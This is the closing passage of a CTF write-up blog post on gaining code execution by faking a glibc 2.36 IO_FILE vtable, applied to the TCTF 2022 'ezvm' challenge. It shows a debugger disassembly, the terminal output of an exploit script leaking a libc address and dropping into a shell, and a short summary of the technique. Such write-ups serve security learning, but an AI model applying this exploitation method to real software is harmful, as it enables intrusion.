&lt;execvpe+1160&gt;:       mov    rsp,QWORD PTR [rbp-0x78]</span><br><span class="line">   0x7f3dbf6ebd0c &lt;execvpe+1164&gt;:       mov    eax,DWORD PTR fs:[r14]</span><br><span class="line">   0x7f3dbf6ebd10 &lt;execvpe+1168&gt;:       jmp    0x7f3dbf6ebb82 &lt;execvpe+770&gt;</span><br><span class="line">   0x7f3dbf6ebd15 &lt;execvpe+1173&gt;:       nop    DWORD PTR [rax]</span><br><span class="line">   0x7f3dbf6ebd18 &lt;execvpe+1176&gt;:       mov    BYTE PTR [rbp-0x61],0x1</span><br><span class="line">   0x7f3dbf6ebd1c &lt;execvpe+1180&gt;:       jmp    0x7f3dbf6ebb9d &lt;execvpe+797&gt;</span><br><span class="line">   0x7f3dbf6ebd21 &lt;execvpe+1185&gt;:       mov    DWORD PTR fs:[rcx],0x7</span><br><span class="line">   0x7f3dbf6ebd28 &lt;execvpe+1192&gt;:       mov    rsp,r15</span><br><span class="line">   0x7f3dbf6ebd2b &lt;execvpe+1195&gt;:       jmp    0x7f3dbf6eb8e4 &lt;execvpe+100&gt;</span><br><span class="line">   0x7f3dbf6ebd30 &lt;execvpe+1200&gt;:       lea    rdi,[r10+0x10]</span><br><span class="line">   0x7f3dbf6ebd34 &lt;execvpe+1204&gt;:       lea    rsi,[rbx+0x8]</span><br><span class="line">   0x7f3dbf6ebd38 &lt;execvpe+1208&gt;:       mov    rdx,r11</span><br><span class="line">   0x7f3dbf6ebd3b &lt;execvpe+1211&gt;:       mov    QWORD PTR [rbp-0x80],r9</span><br><span class="line">gef➤  </span><br></pre></td></tr></table></figure>
<p>Then trigger IO operation by exiting the program.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿bad)-[~/Desktop/ctf/0ctf/ezvm]</span><br><span class="line">└─$ python3 pwnvm3.py</span><br><span class="line">[*] &#x27;/home/kali/Desktop/ctf/0ctf/ezvm/ezvm_p&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br><span class="line">[*] &#x27;/home/kali/Desktop/ctf/0ctf/ezvm/libc-2.35.so&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br><span class="line">[+] Starting local process &#x27;/home/kali/Desktop/ctf/0ctf/ezvm/ezvm_p&#x27;: pid 35561</span><br><span class="line">[*] leak data: 0x20</span><br><span class="line">[*] leak data: 0x60</span><br><span class="line">[*] leak data: 0xe0</span><br><span class="line">[*] leak data: 0x4e0</span><br><span class="line">[*] leak data: 0xce0</span><br><span class="line">[*] leak data: 0x1ce0</span><br><span class="line">[*] leak data: 0x9ce0</span><br><span class="line">[*] leak data: 0x19ce0</span><br><span class="line">[*] leak data: 0x819ce0</span><br><span class="line">[*] leak data: 0x1819ce0</span><br><span class="line">[*] leak data: 0x3819ce0</span><br><span class="line">[*] leak data: 0x7819ce0</span><br><span class="line">[*] leak data: 0xf819ce0</span><br><span class="line">[*] leak data: 0x1f819ce0</span><br><span class="line">[*] leak data: 0x3f819ce0</span><br><span class="line">[*] leak data: 0xbf819ce0</span><br><span class="line">[*] leak data: 0x1bf819ce0</span><br><span class="line">[*] leak data: 0x5bf819ce0</span><br><span class="line">[*] leak data: 0xdbf819ce0</span><br><span class="line">[*] leak data: 0x1dbf819ce0</span><br><span class="line">[*] leak data: 0x3dbf819ce0</span><br><span class="line">[*] leak data: 0x13dbf819ce0</span><br><span class="line">[*] leak data: 0x33dbf819ce0</span><br><span class="line">[*] leak data: 0x73dbf819ce0</span><br><span class="line">[*] leak data: 0xf3dbf819ce0</span><br><span class="line">[*] leak data: 0x1f3dbf819ce0</span><br><span class="line">[*] leak data: 0x3f3dbf819ce0</span><br><span class="line">[*] leak data: 0x7f3dbf819ce0</span><br><span class="line">[+] leak: 0x7f3dbf819ce0</span><br><span class="line">[+] libcbase: 0x7f3dbf600000</span><br><span class="line">[*] writing to stderr</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line"></span><br><span class="line">finish!</span><br><span class="line">continue?</span><br><span class="line"><span class="meta">$</span><span class="bash"> a</span></span><br><span class="line">Please input your code size:</span><br><span class="line"><span class="meta">$</span><span class="bash"> a</span></span><br><span class="line">Please input your memory count:</span><br><span class="line"><span class="meta">$</span><span class="bash"> a</span></span><br><span class="line">Please input your code:</span><br><span class="line">Wrong length!</span><br><span class="line"><span class="meta">$</span><span class="bash"> <span class="built_in">echo</span> pwn</span></span><br><span class="line">pwn</span><br><span class="line"><span class="meta">$</span><span class="bash"> </span> </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h2 id="Conclusion">Conclusion</h2>
<p>With this method we can gain arbitrary code execution without constructing any complex structure but only two arbitrary writing and libc address leaking. One of the most obvious drawbacks(in my opinion) is that we almost can’t control any registers which are used to pass arguments, thus we can only jump to one gadget to get shell here.</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
      <!--
     --><li style="display: block;">
        <span style="display: flex; align-items: center;">
          <svg class="index-item-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" style="margin-right: 10px; color: white; width: 21px; ">
            <title>Home</title>
            <path d="<svg data-testid="geist-icon" height="16" stroke-linejoin="round" viewBox="0 0 16 16" width="16" style="color: currentcolor;"><path fill-rule="evenodd" clip-rule="evenodd" d="M12.5 6.56062L8.00001 2.06062L3.50001 6.56062V13.5L6.00001 13.5V11C6.00001 9.89539 6.89544 8.99996 8.00001 8.99996C9.10458 8.99996 10 9.89539 10 11V13.5L12.5 13.5V6.56062ZM13.78 5.71933L8.70711 0.646409C8.31659 0.255886 7.68342 0.255883 7.2929 0.646409L2.21987 5.71944C2.21974 5.71957 2.21961 5.7197 2.21949 5.71982L0.469676 7.46963L-0.0606537 7.99996L1.00001 9.06062L1.53034 8.53029L2.00001 8.06062V14.25V15H2.75001L6.00001 15H7.50001H8.50001H10L13.25 15H14V14.25V8.06062L14.4697 8.53029L15 9.06062L16.0607 7.99996L15.5303 7.46963L13.7806 5.71993C13.7804 5.71973 13.7802 5.71953 13.78 5.71933ZM8.50001 11V13.5H7.50001V11C7.50001 10.7238 7.72386 10.5 8.00001 10.5C8.27615 10.5 8.50001 10.7238 8.50001 11Z" fill="currentColor"></path></svg>" fill="white"/>
          </svg>
          <a href="../../../../index.html">Home</a>
        </span>
      </li><!--
     --><li style="display: block;">
        <span style="display: flex; align-items: center;">
          <svg class="index-item-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" style="margin-right: 10px; color: white; width: 21px; ">
            <title>Writing</title>
            <path d="<svg data-testid="geist-icon" height="16" stroke-linejoin="round" viewBox="0 0 16 16" width="16" style="color: currentcolor;"><path clip-rule="evenodd" d="M4.25 0C3.00736 0 2 1.00736 2 2.25V11V11.25V11.5C2 12.5252 2.61705 13.4062 3.5 13.792V11.5V11.25V11C3.5 10.4477 3.94772 10 4.5 10H12.5V11.2305V12.5H10.5V14H12.5H14V12.5V11.2305V10V8.5V0.75V0H13.25H4.25ZM12.5 8.5V1.5H4.25C3.83579 1.5 3.5 1.83579 3.5 2.25V8.70802C3.80623 8.57422 4.14445 8.5 4.5 8.5H12.5ZM5.5 11.5C5.22386 11.5 5 11.7239 5 12V16L7 14.75L9 16V12C9 11.7239 8.77614 11.5 8.5 11.5H5.5Z" fill="currentColor" fill-rule="evenodd"></path></svg>" fill="white"/>
          </svg>
          <a href="../../../../archives/">Writing</a>
        </span>
      </li><!--
     --><li style="display: block;">
        <span style="display: flex; align-items: center;">
          <svg class="index-item-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" style="margin-right: 10px; color: white; width: 21px; ">
            <title>Projects</title>
            <path d="<svg data-testid="geist-icon" height="16" stroke-linejoin="round" viewBox="0 0 16 16" width="16" style="color: currentcolor;"><path fill-rule="evenodd" clip-rule="evenodd" d="M1.80808 4.44191L2.25003 4.88386L3.13391 3.99997L2.69196 3.55803L1.63391 2.49997L2.69197 1.44191L3.13391 0.999972L2.25003 0.116089L1.80808 0.558031L0.484858 1.88126C0.143149 2.22296 0.143149 2.77698 0.484859 3.11869L1.80808 4.44191ZM12 0.999972H11.25V2.49997H12H13.5V11.75C13.5 12.7165 12.7165 13.5 11.75 13.5H4.25002C3.28353 13.5 2.50003 12.7165 2.50003 11.75V6.99997V6.24997H1.00003V6.99997V11.75C1.00003 13.5449 2.4551 15 4.25002 15H11.75C13.545 15 15 13.5449 15 11.75V1.74997V0.999972H14.25H12ZM7.75003 4.88386L8.19197 4.44191L9.51519 3.11869C9.8569 2.77698 9.8569 2.22296 9.51519 1.88126L8.19196 0.55803L7.75002 0.116089L6.86614 0.999973L7.30808 1.44191L8.36614 2.49997L7.30809 3.55803L6.86615 3.99997L7.75003 4.88386ZM4.13155 3.89688L4.02847 4.51535L5.26541 4.7215L5.36848 4.10303L5.86848 1.10303L5.97156 0.484566L4.73462 0.278409L4.63155 0.896878L4.13155 3.89688Z" fill="currentColor"></path></svg>" fill="white"/>
          </svg>
          <a href="../../../../https:/github.com/KpwnZ">Projects</a>
        </span>
      </li>
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#invalid-vtable"><span class="toc-number">1.1.</span> <span class="toc-text">invalid vtable</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TCTF-2022-ezvm"><span class="toc-number">1.2.</span> <span class="toc-text">TCTF 2022 ezvm</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Conclusion"><span class="toc-number">1.3.</span> <span class="toc-text">Conclusion</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&text=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&is_video=false&description=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]&body=Check out this article: https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&name=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&t=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    Xia0o0o0o
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="../../../../index.html">Home</a></li><!--
     --><!--
       --><li><a href="../../../../archives/">Writing</a></li><!--
     --><!--
       --><li><a href="../../../../https:/github.com/KpwnZ">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="../../../../js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
